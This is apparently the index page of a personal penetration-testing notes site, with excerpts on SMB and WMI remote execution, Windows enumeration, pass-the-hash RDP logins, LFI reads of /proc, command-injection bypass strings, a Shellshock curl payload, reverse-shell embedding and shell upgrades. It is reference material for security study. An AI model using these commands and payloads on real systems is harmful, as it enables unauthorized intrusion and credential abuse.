akde/infosec

Information security is ultimately about managing risk


  • With username/password With psex­ec (Pre­req­ui­sites: ADMIN$ share is avail­able, the user is part of the local admin­is­tra­tor group on the target) With psex­ec via Metasploit use exploit/windows/smb/psexec With atex­ec (Impack­et) atexec.py dom/user:pass@$target cmd.exe With wmiex­ec wmiexec.py domain.local/$target:$password@$ip With Smbmap smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target With Wmic (To run a…


  • Auto­mates Win­dows enu­mer­a­tion. Github page Usage Seatbelt.exe -group=all Run Seatbelt.exe with­out argu­ments to see pos­si­ble para­me­ters. Example Seatbelt.exe OSInfo Processes Remote From anoth­er Win­dows sys­tem, seat­belt can con­nect to a vic­tim and per­form com­mands there. Seatbelt.exe LogonSessions -computername=$victim -username=bob -password=bobber Command aggregation There are already some groups defined which per­form mul­ti­ple tests at once. Seatbelt.exe -group=system [-computername=...]Seatbelt.exe…


  • Source on Github Cre­ates screen­shots from a list of URLs. Good way to get fast an over­wiew over a new site. With nmap, use ‑oA file to save the out­put also as XML file. Eye­Wit­ness can use this file via ‑x file and make screen­shots of all of this sites. EyeWitness.py --web -x webservers.xml


  • The usual order Network scan Detect hosts for a domain (use Seclist): for ip in $(cat common-subdomains.txt); do host $ip.megacorpone.com; done Reverse lookup: Find domains for addresses: for ip in $(seq 155 190); do host 50.7.67.$ip; done | grep -v "not found" Zonefile enumeration Grab zone­file from a ran­dom tar­get domain: host -a -l fraunhofer.de ns3.fraunhofer.de…


  • Vul­ner­a­bil­i­ty Assessment Pen­test Focus All vul­ner­a­bil­i­ties Only exploitable vulnerabilities Depth On the sur­face only On mul­ti­ple lay­ers (incl. pivoting) Risk Esti­mat­ed Enables for bet­ter esti­ma­tion due to com­bi­na­tion of vulnerabilities


  • For reverse engineering Devi­ce­name Con­tent /proc/$pid/maps Shows the mem­pory map­ping of a process. Includes all used libraries. /proc/self/loginuid Own UID. Read processes If you can read /proc via a LFI: #!/bin/bash for i in {1..1024} do echo $i curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i done The, look in the /tmp/proc direc­to­ry for files > 0 byte. Read envi­ron­ment of…


  • Use pro­files: See https://github.com/eon01/AWS-CheatSheet for many com­mands or https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-access-token/ General Get Infos of the cur­rent used profile aws [--profile $profile] sts get-caller-identity Anoth­er pos­si­bil­i­ty to gain an ARN (with account id) is to call a non-exist­ing func­tion and to extract data from the error message. EC2 List all EC2 images = AMI’s: aws [--profile $profile] ec2…


  • The DPAPI is a Win­dows sys­tem which stored pass­words bound to the local system. In the user direc­to­ry there are the keys stored in the AppData\Roaming\Microsoft\Protect\<SID> directory. From the user’s pass­word, a mas­ter key is derived. When the user changes his pass­word, a new mas­ter key is gen­er­at­ed as well — and all old mas­ter…


  • Try this ressources if you can access files, but not list­ing them. http://pwnwiki.io/#!presence/windows/blind.md Cheat sheet 1 List In Apache and prob­a­bly more sys­tems you can “trav­el over” non-exist­ing files because the path is short­ened before check­ing the exis­tence of a file. Exam­ple: /test/test.txt/../../index.html will return in an Apache the root’s index.html even if the test direco­ry and…


  • This is how a PDF doc­u­ment looks — with a JavaScript exe­cu­tion. Note that with Ope­n­Ac­tion 6 (object block 6) this block is exe­cut­ed when the doc­u­ment is opened. Oth­er way to cre­ate a mali­cious PDF: Analyse a PDF file If a PDF file is com­pressed, decom­press it first. pdftk input.pdf output output.pdf uncompress Get details with Pdfin­fo…


  • Use rdesk­top for a nor­mal login rdesktop $target Nor­mal login for a local user xfreerdp /cert-ignore /u:user /p:pass /v:$target Login for a domain user xfreerdp /cert-ignore /u:user /d:dom.com /p:pass /v:1$target To log in with a NTML hash, use xfreerdp. xfreerdp /u:Peter /pth:666fb5b812a486f87062670c3baf1852 /v:$target Acti­vate net localgroup "Remote Desktop Users" Administrator /add Create a new admin and enable…


  • Shell­ter kann add a reverse shell pay­load into a exe file.


  • Configuration options env_reset: Resets the envi­ron­ment to default con­fig­ured in /etc/environment. env_keep: Adds envi­ron­ment vari­ables which are addi­tion­al­ly allowed. If LD_PRELOAD is in there, see below. mail_badpass: Sends an email to the admin if a user failed to pro­vide a sudo password. secure_path: Sets the PATH envi­ron­ment vari­able to the giv­en paths. Configurations Some­thing like the fol­low­ing…


  • This post con­tains a col­lec­tion of vari­able sub­sti­tu­tion commands. Bash $(echo id) Ruby #{} PHP {}


  • See also the encod­ing post for encod­ing methods. Tips Bypassing filters Linux / PHP All URL encod­ed val­ues start­ing with a space character. | id %20%7c%20%69%64 || id %20%7c%7c%20%69%64 & id %20%26%20%69%64 && id %20%26%26%20%69%64 <?php print "1"" ?> %20%3c%3f%70%68%70%20%70%72%69%6e%74%20%22%31%22%22%20%3f%3e ;id %20%3b%69%64 Sources


  • Show shares with smbclient: smbclient --no-pass -L //$targetsmbclient -U guest //$target/smbclient -U Administrator --pw-nt-hash $NTLMHASH \\\\$target\\directory Show shares with oth­er clients: smbmap -R -H $target // No usersmbmap -u L4mpje -p 'bureaulampje' -d WORKGROUP -H $target -R // Usernmap -sV --script=smb-enum-shares -p445 $targetcrackmapexec smb $target -u '' -p '' --shares Vul­ner­a­bil­i­ty scan nmap --script=smb-vul* -p445 $target…


  • Enumeration Mandatory Optional Tools


  • Java Remote Method Invo­ca­tion is a method to exe­cute code remote­ly on oth­er sys­tems. This Ora­cle doc­u­ment describes it. But to use it, a pro­gram has to been uploaded first or it has to be known how to com­mu­ni­cate with it. General A Java reg­istry dae­mon has to be running.  Run rmireg­istry (bun­dled with Java) from…


  • Old­er bash ver­sions may exe­cute code after func­tion definitions. Via command line Source with explanation export newfunction='() { echo 'shellshockdemo';}; echo vulnerable' Via a web server / CGI script Cau­tion: Try the reverse shell exam­ple in Burp also if the curl com­mand fails! curl http://$target/cgi-bin/admin.cgi -s > before curl -H "User-Agent: () { :; }; /bin/bash…


  • Shellshock A func­tion in a envi­ron­ment vari­able is exe­cut­ed in a child process of the bash. When export­ing a new func­tion like this export func=’() { echo mist; }; echo aha;’ and start­ing a new bash ses­sion, “aha” is executed.


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';